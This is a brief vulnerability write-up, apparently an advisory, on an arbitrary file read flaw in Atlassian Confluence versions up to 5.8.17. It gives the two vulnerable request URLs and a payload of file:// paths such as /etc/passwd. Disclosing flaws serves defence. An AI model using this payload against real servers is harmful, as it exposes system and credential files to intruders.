Atlassian Confluence
Atlassian Confluence is a set of professional enterprise knowledge management and collaboration software from Atlassian Company in Australia, which can also be used to build enterprise WiKi. The software enables collaboration and knowledge sharing among team members.
Vulnerability Introduction
Vulnerability Name: Arbitrary File Read
Vulnerability type: WEB type vulnerability
Affected Versions: Less than or equal to version 5.8.17
Vulnerability Rating: High Critical
Vulnerability Details
Vulnerability request:
https://hostdomain/spaces/viewdefaultdecorator.action?decoratorName=PAYLOAD
https://hostdomain/admin/viewdefaultdecorator.action?decoratorName=PAYLOAD
PAYLOAD => file:///d:/xxx/xxx or file:////etc/passwd